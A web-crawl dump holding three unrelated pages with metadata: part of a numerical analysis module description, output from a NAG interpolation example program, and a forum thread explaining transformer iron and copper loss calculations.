Chebyshev equioscillation and de la Vallee-Poussin theorems; Chebyshev polynomials; least-squares, near-minimax, interpolation; forced-oscillation approximations; spectrally accurate evaluation of Fourier co-efficients.\nNumerical Differentiation - 1-D finite differences of arbitrary order and accuracy; FD operators; implicit FD formulae; regular and irregular meshes; molecules and stencils; 2-D FD formulae; first- and higher-order approximations to Laplacian; Poisson equation and Mehrstellenverfahren; high-order multidimensional derivatives.\nNumerical Linear Algebra - matrix and vector norms; spectral radius; diagonal dominance; Gerschgorin's and Bauer's theorems; sparse systems; tridiagonal systems and Cholesky factorisation; Jacobi, Gauss-siedel and SOR iteration; theoretical convergence estimates; optimum over-relaxation; theoretical optimum for 2-cyclic matrices.\nIf time allows, solution of elliptic Dirichlet and Neumann BVPs; chessboard enumeration; Richardson extrapolation.\n\n### Teaching methods\n\n Delivery type Number Length hours Student hours Practical 22 1.00 22.00 Independent online learning hours 55.00 Private study hours 73.00 Total Contact hours 22.00 Total hours (100hr per 10 credits) 150.00\n\n### Opportunities for Formative Feedback\n\nInteraction with module manager through regular practical classes. Assessment of success on example sheets.\n\n### Methods of assessment\n\nExams\n Exam type Exam duration % of formal assessment Standard exam (closed essays, MCQs etc) 2 hr 00 mins 100.00 Total percentage (Assessment Exams) 100.00\n\nNormally resits will be assessed by the same methodology as the first attempt, unless otherwise stated" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8224248,"math_prob":0.8276469,"size":4189,"snap":"2022-40-2023-06","text_gpt3_token_len":949,"char_repetition_ratio":0.104898445,"word_repetition_ratio":0.0,"special_character_ratio":0.1971831,"punctuation_ratio":0.13043478,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99195594,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-30T09:55:26Z\",\"WARC-Record-ID\":\"<urn:uuid:360db06b-a9d4-40db-8a03-9983070a1c0e>\",\"Content-Length\":\"12317\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13ed9ba5-a36e-4a92-b390-aef831c7ae4a>\",\"WARC-Concurrent-To\":\"<urn:uuid:ab8e417e-7a36-474f-8fdd-de5f4344f2c1>\",\"WARC-IP-Address\":\"13.107.246.40\",\"WARC-Target-URI\":\"https://webprod3.leeds.ac.uk/catalogue/dynmodules.asp?Y=202122&M=MATH-3476\",\"WARC-Payload-Digest\":\"sha1:ZV6K5LIYJ4W7FXKOD2CPJDGRNZU56BRE\",\"WARC-Block-Digest\":\"sha1:35SEFLYMCEWJGDME6CX5GULEWBNB3NOF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030335448.34_warc_CC-MAIN-20220930082656-20220930112656-00437.warc.gz\"}"}
https://www.nag.com/numeric/nl/nagdoc_latest/examples/baseresults/e01aa_a1w_fe.r.html
[ "NAG Library Manual, Mark 27.2\nInterfaces:  FL   CL   CPP   AD\n```\nE01AA_A1W_F Example Program Results\n\nInterpolation point = 0.28000\n\nFunction value at interpolation point = -0.83591\n\nDerivatives calculated: First order adjoints\nComputational mode : algorithmic\n\nDerivatives of fitted value w.r.t. x values:\nj d/dx(j)\n1 -0.12035E-01\n2 -0.15767E+00\n3 -0.82321E-02\n4 -0.15188E+01\n5 0.89665E+00\n6 -0.37061E+00\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.538181,"math_prob":0.98109406,"size":336,"snap":"2021-21-2021-25","text_gpt3_token_len":123,"char_repetition_ratio":0.11746988,"word_repetition_ratio":0.0,"special_character_ratio":0.43452382,"punctuation_ratio":0.1891892,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9708106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-13T13:58:53Z\",\"WARC-Record-ID\":\"<urn:uuid:b0e7f4d7-bc3c-4b09-9e55-069a90d2e788>\",\"Content-Length\":\"2218\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:28d83da0-530e-4e9f-b8f8-7a5203217b46>\",\"WARC-Concurrent-To\":\"<urn:uuid:e699e027-50a2-49ab-ab59-ded44f740adc>\",\"WARC-IP-Address\":\"78.129.168.4\",\"WARC-Target-URI\":\"https://www.nag.com/numeric/nl/nagdoc_latest/examples/baseresults/e01aa_a1w_fe.r.html\",\"WARC-Payload-Digest\":\"sha1:ER7EDSEDMFFQQ2X4ECYMAKQDQJ2BCLD4\",\"WARC-Block-Digest\":\"sha1:VUERBLL3YNE67E4V4NB3447XPXCODICI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487608856.6_warc_CC-MAIN-20210613131257-20210613161257-00514.warc.gz\"}"}
https://engineering.electrical-equipment.org/forum/general-discussion/transformer-losses
[ "# transformer losses\n\nViewing 8 posts - 1 through 8 (of 8 total)\n• Author\nPosts\n• #10464\n\nhi can u help me @ transformer (3 phase) losses any formulae or thumb rules.if the transformer is 50 % loaded there are some losses but how to calculate? how we to calculate % of transformer loading?\n\n#12101\n\nHi,\n\nLook for Transformer Test report. It will have Iron losses which will remain almost constant through out the loading cycle. Then look for efficiency on the name plate. This corresponds to full load. Now calculate the full load losses. Example if 1000KVA transformer efficiency is 98% then the losses are 2% i.e. 20KW. If the Iron Losses is indicated as 2KW, then the copper losses are 18KW. Now the copper losses are proportional to square of current. Therefore at 50% load copperlosses will be 0.5 sqare times the full load copper loss. i.e. 0.25X18=4.5KW. Therefore at 50% load you will have 6.5KW losses. If you dont know what is the Iron losses of the transformer, then see the noload power consumption of the transformer, it will  be very close to iron losses.\n\n#12104\n\nanil i agree with you.\n\nBut i think to know the full load losses you have to go for open ckt test (i.e. iron losses) and short ckt test (i.e copper losses).then to know tfransformer loss at any load= iron loss + copper loss at that load.\n\ne.g.  copper loss at 50% load = ( 50% 0f full load current)2*R\n\n=(I/2)2*R\n\n=I2R/4\n\n#12108\n\nTransformer losses are found by short circuit test and open circuit test.\n\n#12113\n\ni want to calcute my home electricity load and also want to know illuminus calclations formuly any bdy hlp me plz?\n\n#12120\n\namit kulkarni said:\n\nhi can u help me @ transformer (3 phase) losses any formulae or thumb rules.if the transformer is 50 % loaded there are some losses but how to calculate? how we to calculate % of transformer loading?\n\nDear Amit ;\n\nthere are 2 kinds of losses : Iron Losse & Cupper losse, the iron loose is not affected by the load, but the cupper load si affected by the load.\n\nNormally, on the name plate of any transformer there's a percentage value ” i % ” that's the percentage current of the nominal current for the iron losse, so, if we have it we can calculate the iron losse. and also on the name plate there is a value of cupper losse on full load in ” watt “, by whici we can calculate the ” R ” of the transformer then accordingly the load's current and the value of R we can calculate the cupper losse, notint taht the formula by which we calculate the ” R ” of any transformer is : R = Pcu/3 . In2  ; where :\n\n– Pcu : is the full load cupper losse\n\n– In2 : is the square on the transformer nominal current\n\nRegards.\n\n#12140\n\ni want\n\nto calcute my home electricity load and also want to know illuminus calclations\n\nformuly any bdy hlp me plz?\n\nHello Dear mhrnaseer,\n\nammeter.\n\nMultiply load current to standard voltages which are usually\n\nIllumination is defined as “the emitted luminous flux per\n\nunit area is called illumination”.\n\nMathematically\n\nE=Φ/A    (lux).\n\nIllumination at any surface can be calculated by two laws:\n\n1) inverse square law\n\n2) Lambert’s law\n\n1)inverse square law tells that the illumination of a\n\nsurface is inversely proportional to the square\n\nof  the distance of the surface\n\nfrom the source.\n\ni.e   E «1/d^2\n\n2) Lambert’s law tells that illumination is directly\n\nproportional to cosine of the angle made by the normal to the illuminated\n\nsurface with the direction of the incident flux.\n\ni.e E  « I cosΘ   where I is  luminous intensity.\n\ncombining the both laws we get\n\nE «(I/d^2)cosΘ\n\nOr\n\nE=(I/d^2)cosΘ\n\n#12172\n\namit kulkarni said:\n\nhi can u help me @ transformer (3 phase) losses any formulae or thumb rules.if the transformer is 50 % loaded there are some losses but how to calculate? how we to calculate % of transformer loading?\n\nWE HAVE TWO TYPES OF LOSSES IN TRANSFORMER…..ie….iron loss and copper loss…one which will be constant for every loads…and the one which vary with bthe loading conditions respectively…..iron loss occurs all the time whether the transformer is loaded or unloaded and hence also called constant loss…and the other occurs only when it is loaded…and vary with the loads..and hence also called variable loss….an open circuit test in which rated voltage is applied to the primary winding and secondary winding is open circuited(test will be carried out in the low voltage side)is used for determining ironloss…..here the wattmeter gives the iron loss…bcos copper loss at no load conduction is negligible…..and the copper loss could be datemined by short circuit test in which rated current is made to flow through the primary winding and secondary winding will be short circuited….here the wattmeter reading gives full load copper loss…and to determine copper loss at  x(FULL LOAD) the below formula can be used…\n\nW(cu,xfl)=X*X*W(cu,fl)    where W(cu,fl) is the full load copper loss……                                                                                                              and the total transformer loss will be iron loss+copper loss\n\nViewing 8 posts - 1 through 8 (of 8 total)\n• You must be logged in to reply to this topic." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8696742,"math_prob":0.9387329,"size":5370,"snap":"2021-43-2021-49","text_gpt3_token_len":1395,"char_repetition_ratio":0.15970927,"word_repetition_ratio":0.15318231,"special_character_ratio":0.25642458,"punctuation_ratio":0.09686347,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9957704,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-17T10:30:21Z\",\"WARC-Record-ID\":\"<urn:uuid:811eaa15-8d6a-4ec7-ab49-cba93eaed680>\",\"Content-Length\":\"81253\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f0fc8df4-a925-4cd9-b06f-86cd6cdb19b2>\",\"WARC-Concurrent-To\":\"<urn:uuid:0ece14c8-43c8-4d7f-8c4c-23b8e2ad7855>\",\"WARC-IP-Address\":\"54.36.91.62\",\"WARC-Target-URI\":\"https://engineering.electrical-equipment.org/forum/general-discussion/transformer-losses\",\"WARC-Payload-Digest\":\"sha1:G2VFNVSHGYPKH4M3DSXNPUL4NVRMHCM6\",\"WARC-Block-Digest\":\"sha1:F4HUGH6NHQCT3MCY6CG6ZCMSS3ECPY73\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585171.16_warc_CC-MAIN-20211017082600-20211017112600-00324.warc.gz\"}"}